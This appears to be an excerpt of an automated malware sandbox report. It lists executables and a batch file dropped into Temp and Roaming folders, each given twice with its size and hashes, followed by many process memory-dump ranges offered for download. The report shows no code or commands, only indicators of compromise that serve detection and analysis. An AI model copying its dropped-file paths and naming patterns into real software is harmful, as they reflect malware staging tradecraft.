cfdb339b4d7125188320d70f5d005a46caa2a2f29fb70ecde4eb5f9187704b1e

SHA512
511c9dade0883aaaf50989f187131812049d264b2bbec109b79c5058fe12c3b0cb5def6f89b1fe7bb58e3835416432decad8427e1e83b0b8c50a057e4a363060

Download Submit
C:\Users\Admin\AppData\Local\Temp\2403.exe

Filesize
1.9MB

MD5
1ab692faa421b9fa9819e9dbfd863a8e

SHA1
b43b5dffc44489f4110391854f4c28e8f3031f2c

SHA256
cfdb339b4d7125188320d70f5d005a46caa2a2f29fb70ecde4eb5f9187704b1e

SHA512
511c9dade0883aaaf50989f187131812049d264b2bbec109b79c5058fe12c3b0cb5def6f89b1fe7bb58e3835416432decad8427e1e83b0b8c50a057e4a363060

Download Submit
C:\Users\Admin\AppData\Local\Temp\4085.exe

Filesize
2.5MB

MD5
0df65d1268b5aabf901bf6fa5e8ff68a

SHA1
4327acdaa4a7984b5b26e046c60ae1ee4709425d

SHA256
450629dcfc0acacd275f681fb008c4c7e4ee2672c21a817ef50cc5ec6fa79f27

SHA512
7814bab1bd62d4fafece6b0bfe3d223471759aa3468a3271419bc99f1c7d3b56def894bf95c66d99901c0c0ee0c041b6efa11b6d528f2466dfe76b9d8a9f9bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\4085.exe

Filesize
2.5MB

MD5
0df65d1268b5aabf901bf6fa5e8ff68a

SHA1
4327acdaa4a7984b5b26e046c60ae1ee4709425d

SHA256
450629dcfc0acacd275f681fb008c4c7e4ee2672c21a817ef50cc5ec6fa79f27

SHA512
7814bab1bd62d4fafece6b0bfe3d223471759aa3468a3271419bc99f1c7d3b56def894bf95c66d99901c0c0ee0c041b6efa11b6d528f2466dfe76b9d8a9f9bda

Download Submit
C:\Users\Admin\AppData\Local\Temp\4B73.exe

Filesize
2.3MB

MD5
76fbdbcc06a5395287f56bb77ec4cbd4

SHA1
7f1fe1585b65f964043db4224b52805412ac0fd7

SHA256
b6556f0a375bb589bfb6ebd5156e95e194a300e820734f0b0c5ab208619189af

SHA512
e08648ab2ec153aa7e9aa7666c99900ce2679a87316114f5902a9107a9bbf59b29c19c37929a4f1e299d02f3e8e1cf3bd2e19664f3b32ba9d7cebe5efff14e75

Download Submit
C:\Users\Admin\AppData\Local\Temp\4B73.exe

Filesize
2.3MB

MD5
76fbdbcc06a5395287f56bb77ec4cbd4

SHA1
7f1fe1585b65f964043db4224b52805412ac0fd7

SHA256
b6556f0a375bb589bfb6ebd5156e95e194a300e820734f0b0c5ab208619189af

SHA512
e08648ab2ec153aa7e9aa7666c99900ce2679a87316114f5902a9107a9bbf59b29c19c37929a4f1e299d02f3e8e1cf3bd2e19664f3b32ba9d7cebe5efff14e75

Download Submit
C:\Users\Admin\AppData\Local\Temp\68BC.exe

Filesize
722KB

MD5
ba7ecdcd6dd5adbe638a7ab6a15cda56

SHA1
10d683fc4388492c2529abaeb61ee4b792ed033d

SHA256
3f81d63b18447869345ec2e06ba544bebe65d95e6ab84b163c3ba117bed75d5d

SHA512
8730b836384275d23a8772b76c58d9d17cc1e12e517bb9052ee878ea7775a47e7fdc313cdb061b61f69109ac5ea5c099d6f878f6124274c17a786126731a4437

Download Submit
C:\Users\Admin\AppData\Local\Temp\68BC.exe

Filesize
722KB

MD5
ba7ecdcd6dd5adbe638a7ab6a15cda56

SHA1
10d683fc4388492c2529abaeb61ee4b792ed033d

SHA256
3f81d63b18447869345ec2e06ba544bebe65d95e6ab84b163c3ba117bed75d5d

SHA512
8730b836384275d23a8772b76c58d9d17cc1e12e517bb9052ee878ea7775a47e7fdc313cdb061b61f69109ac5ea5c099d6f878f6124274c17a786126731a4437

Download Submit
C:\Users\Admin\AppData\Local\Temp\93B5.exe

Filesize
722KB

MD5
5fc5d95aab0be30e64e8a7a8f3d380fb

SHA1
6ef4f800cf1ae6cf36a075d0c9f1c11edd0254ac

SHA256
577b0912bda5f33e1d6591667594f65df7ed28cdae9db35bf5d74f9d70d6650c

SHA512
8b2cd21cd4c86070120e2c869e74108f20dcc1fb633c24c24cd3f0d7df77ac2b31d69916e46ae01b75eebcfc02fa56dce6f6d8e01989c5f45a5d23be21f6a210

Download Submit
C:\Users\Admin\AppData\Local\Temp\93B5.exe

Filesize
722KB

MD5
5fc5d95aab0be30e64e8a7a8f3d380fb

SHA1
6ef4f800cf1ae6cf36a075d0c9f1c11edd0254ac

SHA256
577b0912bda5f33e1d6591667594f65df7ed28cdae9db35bf5d74f9d70d6650c

SHA512
8b2cd21cd4c86070120e2c869e74108f20dcc1fb633c24c24cd3f0d7df77ac2b31d69916e46ae01b75eebcfc02fa56dce6f6d8e01989c5f45a5d23be21f6a210

Download Submit
C:\Users\Admin\AppData\Local\Temp\B2D7.exe

Filesize
1.1MB

MD5
fc94f1745be2386dfa3b366c85087517

SHA1
11a5b56dec0c9a123384a7a1c71b724e79371c6f

SHA256
62625350280734d5a4f3cc76ea43e398a880a61b9d5eaeafff36ef5a64146917

SHA512
323d3af27ed930957842fda8bfc42ab0d3efa220c8023ee6583c3c735a1cd8c52248ba387155c76ea295ba600288f776d5a046ce0b1170b206dc4e2d6c4c4514

Download Submit
C:\Users\Admin\AppData\Local\Temp\B2D7.exe

Filesize
1.1MB

MD5
fc94f1745be2386dfa3b366c85087517

SHA1
11a5b56dec0c9a123384a7a1c71b724e79371c6f

SHA256
62625350280734d5a4f3cc76ea43e398a880a61b9d5eaeafff36ef5a64146917

SHA512
323d3af27ed930957842fda8bfc42ab0d3efa220c8023ee6583c3c735a1cd8c52248ba387155c76ea295ba600288f776d5a046ce0b1170b206dc4e2d6c4c4514

Download Submit
C:\Users\Admin\AppData\Local\Temp\C382.exe

Filesize
2.8MB

MD5
71f2cda4d37c2d14e25508aea40dc9ab

SHA1
9a377f7966fb3c2d2c57cdc1fba0c115baca79ee

SHA256
24c473a2c1932ea9bcb5c3ce443da0ce704f60b180243e605cc7fe86fd5db80a

SHA512
a060e640cd330bf4a0725b3600342b0587649b5fce7f150b79a37df8866b2b9460c6341326ef0ffd5d194f59befcf46b940ee17c0d205d38f8cc7310e4a0195f

Download Submit
C:\Users\Admin\AppData\Local\Temp\C382.exe

Filesize
2.8MB

MD5
71f2cda4d37c2d14e25508aea40dc9ab

SHA1
9a377f7966fb3c2d2c57cdc1fba0c115baca79ee

SHA256
24c473a2c1932ea9bcb5c3ce443da0ce704f60b180243e605cc7fe86fd5db80a

SHA512
a060e640cd330bf4a0725b3600342b0587649b5fce7f150b79a37df8866b2b9460c6341326ef0ffd5d194f59befcf46b940ee17c0d205d38f8cc7310e4a0195f

Download Submit
C:\Users\Admin\AppData\Local\Temp\D46B.exe

Filesize
318KB

MD5
8102360a4cfb5b7feab6281112637ff4

SHA1
a80430640df75d84536d3cf02be0762ca6c5735f

SHA256
c3e02882a6ae7620af4a236731566b2fc9871a3284480ef81e29ae2251325400

SHA512
8d978a629b2fdb229fc74f3bf81bd98e19a45f501e077eb0747bacf7ffafcb8cec767269b7d6840631c63a72d5bf42368700bc0f774caf51a26b0aa7a41d821c

Download Submit
C:\Users\Admin\AppData\Local\Temp\D46B.exe

Filesize
318KB

MD5
8102360a4cfb5b7feab6281112637ff4

SHA1
a80430640df75d84536d3cf02be0762ca6c5735f

SHA256
c3e02882a6ae7620af4a236731566b2fc9871a3284480ef81e29ae2251325400

SHA512
8d978a629b2fdb229fc74f3bf81bd98e19a45f501e077eb0747bacf7ffafcb8cec767269b7d6840631c63a72d5bf42368700bc0f774caf51a26b0aa7a41d821c

Download Submit
C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe

Filesize
318KB

MD5
8102360a4cfb5b7feab6281112637ff4

SHA1
a80430640df75d84536d3cf02be0762ca6c5735f

SHA256
c3e02882a6ae7620af4a236731566b2fc9871a3284480ef81e29ae2251325400

SHA512
8d978a629b2fdb229fc74f3bf81bd98e19a45f501e077eb0747bacf7ffafcb8cec767269b7d6840631c63a72d5bf42368700bc0f774caf51a26b0aa7a41d821c

Download Submit
C:\Users\Admin\AppData\Local\Temp\b667dbdcd8\rovwer.exe

Filesize
318KB

MD5
8102360a4cfb5b7feab6281112637ff4

SHA1
a80430640df75d84536d3cf02be0762ca6c5735f

SHA256
c3e02882a6ae7620af4a236731566b2fc9871a3284480ef81e29ae2251325400

SHA512
8d978a629b2fdb229fc74f3bf81bd98e19a45f501e077eb0747bacf7ffafcb8cec767269b7d6840631c63a72d5bf42368700bc0f774caf51a26b0aa7a41d821c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD205.tmp.bat

Filesize
153B

MD5
75b5c2f4f18c07737b4bf92ac22e420c

SHA1
d57522eb8e56c1d7a7838836e60f663c3a07228d

SHA256
f35779e2bf7711c4817ebe6dbe6929b84b2283dc91e144c29d0ad1ec12ba8617

SHA512
17170c273196e586d4921a67156bef9cd5353332509a68f1928600c510f17b29839da83b36533ffa94d63eca93daa0c93512d98908b83cdd8b2e857118f13360

Download Submit
C:\Users\Admin\AppData\Roaming\aegiair

Filesize
286KB

MD5
1fc67595c2e6b55d456b9cd090ece64d

SHA1
d714d38984725324da6f222b09b1c4111656cc6f

SHA256
514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420

SHA512
21a987ea2cfa83a44726e3648b146e0b041b6a25ba4386356cfca614ab7e6af2f1da0b928a94da6dbea6c77188db719142ceb73f06329abb2987726b7fdca876

Download Submit
C:\Users\Admin\AppData\Roaming\aegiair

Filesize
286KB

MD5
1fc67595c2e6b55d456b9cd090ece64d

SHA1
d714d38984725324da6f222b09b1c4111656cc6f

SHA256
514e6febf5ebb158e2cbbd8b55669cb4373653398b120f302fa7fcda89525420

SHA512
21a987ea2cfa83a44726e3648b146e0b041b6a25ba4386356cfca614ab7e6af2f1da0b928a94da6dbea6c77188db719142ceb73f06329abb2987726b7fdca876

Download Submit
C:\Users\Admin\AppData\Roaming\eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe

Filesize
837KB

MD5
e620507c28834b337195ca9d35c4a79b

SHA1
5b80356e3066da91a8193493c9fbfc37e259c226

SHA256
703e1fb4de14b29eca7245d72f7ccf27e1cebb068f6381dc28c64661a4b5058b

SHA512
123b25991a0951cdbd5a9e912db373c6924f465f3332d73c0a7ca0e3520aca84a6eefc1e2b0696f2e326f177a166c3c1a7e25fc8c2594fac5ac1961af58bb2a5

Download Submit
C:\Users\Admin\AppData\Roaming\eChAhUSSeAssSUSUfHuUCeAKCsFHHKsHFBAKhAKFsCBFEFKHCHESfBS.exe

Filesize
837KB

MD5
e620507c28834b337195ca9d35c4a79b

SHA1
5b80356e3066da91a8193493c9fbfc37e259c226

SHA256
703e1fb4de14b29eca7245d72f7ccf27e1cebb068f6381dc28c64661a4b5058b

SHA512
123b25991a0951cdbd5a9e912db373c6924f465f3332d73c0a7ca0e3520aca84a6eefc1e2b0696f2e326f177a166c3c1a7e25fc8c2594fac5ac1961af58bb2a5

Download Submit
memory/632-194-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/632-246-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/632-189-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/632-188-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/632-185-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/632-183-0x0000000000400000-0x0000000000846000-memory.dmp

Filesize
4.3MB

Download
memory/760-253-0x0000000000AB0000-0x0000000000AB7000-memory.dmp

Filesize
28KB

Download
memory/760-254-0x0000000000AA0000-0x0000000000AAD000-memory.dmp

Filesize
52KB

Download
memory/760-266-0x0000000000AB0000-0x0000000000AB7000-memory.dmp

Filesize
28KB

Download
memory/1068-169-0x00007FF904EE0000-0x00007FF9059A1000-memory.dmp

Filesize
10.8MB

Download
memory/1068-164-0x00007FF904EE0000-0x00007FF9059A1000-memory.dmp

Filesize
10.8MB

Download
memory/1068-154-0x0000000000530000-0x0000000000650000-memory.dmp

Filesize
1.1MB

Download
memory/1576-179-0x0000000000DF0000-0x00000000015D9000-memory.dmp

Filesize
7.9MB

Download
memory/1576-168-0x0000000000DF0000-0x00000000015D9000-memory.dmp

Filesize
7.9MB

Download
memory/1656-135-0x0000000000400000-0x0000000002C36000-memory.dmp

Filesize
40.2MB

Download
memory/1656-134-0x0000000000400000-0x0000000002C36000-memory.dmp

Filesize
40.2MB

Download
memory/1656-132-0x0000000002CF2000-0x0000000002D07000-memory.dmp

Filesize
84KB

Download
memory/1656-133-0x0000000002CC0000-0x0000000002CC9000-memory.dmp

Filesize
36KB

Download
memory/1848-240-0x0000000000A90000-0x0000000000A95000-memory.dmp

Filesize
20KB

Download
memory/1848-241-0x0000000000A80000-0x0000000000A89000-memory.dmp

Filesize
36KB

Download
memory/1848-264-0x0000000000A90000-0x0000000000A95000-memory.dmp

Filesize
20KB

Download
memory/2308-203-0x00007FF904E70000-0x00007FF905931000-memory.dmp

Filesize
10.8MB

Download
memory/2308-285-0x00007FF904E70000-0x00007FF905931000-memory.dmp

Filesize
10.8MB

Download
memory/2308-249-0x00007FF904E70000-0x00007FF905931000-memory.dmp

Filesize
10.8MB

Download
memory/2780-213-0x0000000002D50000-0x0000000002D8A000-memory.dmp

Filesize
232KB

Download
memory/2780-261-0x0000000000400000-0x0000000002C3D000-memory.dmp

Filesize
40.2MB

Download
memory/2780-212-0x0000000002E83000-0x0000000002EA1000-memory.dmp

Filesize
120KB

Download
memory/2780-214-0x0000000000400000-0x0000000002C3D000-memory.dmp

Filesize
40.2MB

Download
memory/3216-236-0x00000000012E0000-0x00000000012E9000-memory.dmp

Filesize
36KB

Download
memory/3216-237-0x00000000012D0000-0x00000000012DF000-memory.dmp

Filesize
60KB

Download
memory/3216-263-0x00000000012E0000-0x00000000012E9000-memory.dmp

Filesize
36KB

Download
memory/3364-251-0x0000000000E10000-0x0000000000E16000-memory.dmp

Filesize
24KB

Download
memory/3364-257-0x0000000000E00000-0x0000000000E0B000-memory.dmp

Filesize
44KB

Download
memory/3472-224-0x0000000000740000-0x0000000000747000-memory.dmp

Filesize
28KB

Download
memory/3472-262-0x0000000000740000-0x0000000000747000-memory.dmp

Filesize
28KB

Download
memory/3472-225-0x0000000000730000-0x000000000073B000-memory.dmp

Filesize
44KB

Download
memory/3536-221-0x0000000005C90000-0x0000000005CF6000-memory.dmp

Filesize
408KB

Download
memory/3536-156-0x00000000075D0000-0x000000000760C000-memory.dmp

Filesize
240KB

Download
memory/3536-143-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/3536-149-0x0000000007AB0000-0x00000000080C8000-memory.dmp

Filesize
6.1MB

Download
memory/3536-150-0x0000000007610000-0x000000000771A000-memory.dmp

Filesize
1.0MB

Download
memory/3536-155-0x0000000005B00000-0x0000000005B12000-memory.dmp

Filesize
72KB

Download
memory/3536-217-0x0000000005BF0000-0x0000000005C82000-memory.dmp

Filesize
584KB

Download
memory/3536-278-0x0000000009350000-0x0000000009512000-memory.dmp

Filesize
1.8MB

Download
memory/3536-279-0x0000000009A50000-0x0000000009F7C000-memory.dmp

Filesize
5.2MB

Download
memory/3536-218-0x0000000008680000-0x0000000008C24000-memory.dmp

Filesize
5.6MB

Download
memory/3620-187-0x0000000004BF0000-0x0000000004DA6000-memory.dmp

Filesize
1.7MB

Download
memory/3620-186-0x0000000003009000-0x00000000031C0000-memory.dmp

Filesize
1.7MB

Download
memory/3752-259-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/3752-267-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/3752-260-0x0000000000D80000-0x0000000000D8B000-memory.dmp

Filesize
44KB

Download
memory/3848-193-0x0000000000400000-0x0000000002C3D000-memory.dmp

Filesize
40.2MB

Download
memory/3848-222-0x0000000002C63000-0x0000000002C81000-memory.dmp

Filesize
120KB

Download
memory/3848-229-0x0000000000400000-0x0000000002C3D000-memory.dmp

Filesize
40.2MB

Download
memory/3848-181-0x0000000004870000-0x00000000048AA000-memory.dmp

Filesize
232KB

Download
memory/3848-180-0x0000000002C63000-0x0000000002C81000-memory.dmp

Filesize
120KB

Download
memory/3900-265-0x0000000000F10000-0x0000000000F16000-memory.dmp

Filesize
24KB

Download
memory/3900-243-0x0000000000F10000-0x0000000000F16000-memory.dmp

Filesize
24KB

Download
memory/3900-244-0x0000000000F00000-0x0000000000F0C000-memory.dmp

Filesize
48KB

Download
memory/3984-250-0x0000000000F90000-0x0000000000F95000-memory.dmp

Filesize
20KB

Download
memory/3984-256-0x0000000000F80000-0x0000000000F89000-memory.dmp

Filesize
36KB

Download
memory/4232-235-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4232-227-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4716-211-0x0000000000720000-0x000000000077E000-memory.dmp

Filesize
376KB

Download
memory/4716-205-0x0000000000720000-0x000000000077E000-memory.dmp

Filesize
376KB

Download
memory/4952-247-0x0000000000D50000-0x0000000000D72000-memory.dmp

Filesize
136KB

Download
memory/4952-258-0x0000000000D20000-0x0000000000D47000-memory.dmp

Filesize
156KB

Download
memory/5008-148-0x00000000009C0000-0x0000000000A78000-memory.dmp

Filesize
736KB

Download
memory/5064-165-0x00007FF904EE0000-0x00007FF9059A1000-memory.dmp

Filesize
10.8MB

Download
memory/5064-167-0x00007FF904EE0000-0x00007FF9059A1000-memory.dmp

Filesize
10.8MB

Download
memory/5064-163-0x0000000000290000-0x0000000000366000-memory.dmp

Filesize
856KB

Download
memory/7088-280-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/7088-282-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/7088-283-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/7088-286-0x0000000140000000-0x00000001400C6000-memory.dmp

Filesize
792KB

Download
memory/10980-287-0x0000000002D93000-0x0000000002DA9000-memory.dmp

Filesize
88KB

Download